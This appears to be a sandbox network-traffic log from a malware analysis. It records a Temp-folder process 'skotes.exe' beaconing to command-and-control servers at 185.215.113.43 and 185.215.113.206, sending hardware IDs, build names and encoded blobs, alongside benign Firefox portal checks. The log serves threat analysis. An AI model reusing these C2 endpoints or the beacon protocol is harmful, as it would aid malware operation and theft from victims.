Dec 14, 2024 13:00:42.096457958 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 31 37 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015175001&unit=246122658369
Dec 14, 2024 13:00:43.449770927 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	50249	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:45.191577911 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:00:46.523829937 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.4	50250	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:45.299253941 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 14, 2024 13:00:46.647639990 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 12:00:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 13:00:46.855946064 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJEGCAAECBFIEBGHJDG Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 43 41 41 45 43 42 46 49 45 42 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 41 45 30 32 34 37 44 38 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 43 41 41 45 43 42 46 49 45 42 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 43 41 41 45 43 42 46 49 45 42 47 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------HJJEGCAAECBFIEBGHJDGContent-Disposition: form-data; name="hwid"08AE0247D8BC4158135236------HJJEGCAAECBFIEBGHJDGContent-Disposition: form-data; name="build"stok------HJJEGCAAECBFIEBGHJDG--
Dec 14, 2024 13:00:47.304002047 CET	210	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 12:00:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.4	50262	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:47.133354902 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:00:48.223047018 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76955 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:00:48.327227116 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:00:48.644808054 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76955 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:00:48.905440092 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:00:49.220994949 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76956 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:00:49.305844069 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:00:49.622243881 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76956 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:00:49.655448914 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:00:49.970607042 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76956 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:00:50.362008095 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:00:50.677115917 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76957 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:00:51.589214087 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:00:51.906023979 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76958 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:00:54.928472996 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:00:55.244895935 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76962 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:01:05.342339039 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	50271	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:48.164550066 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:00:49.502196074 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	50274	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:48.491170883 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.4	50277	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:48.781160116 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.4	50279	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:49.346491098 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.4	50281	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:49.745742083 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.4	50282	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:50.094222069 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.4	50286	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:50.803029060 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 13:00:51.889095068 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77304 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 13:00:51.909161091 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 13:00:52.223810911 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77305 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 13:00:55.247409105 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 13:00:55.562536001 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77308 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 13:01:05.627090931 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	50287	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:51.247633934 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:00:52.601317883 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	50289	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:54.250768900 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:00:55.587572098 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	50290	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:57.340935946 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:00:58.724478006 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	50291	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:00.382864952 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:01:01.712677002 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	50292	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:03.454658985 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:01:04.798209906 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	50293	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:06.438494921 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:01:07.795048952 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	50294	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:09.548481941 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:01:10.890590906 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	50295	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:09.767774105 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 14, 2024 13:01:11.116202116 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 12:01:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
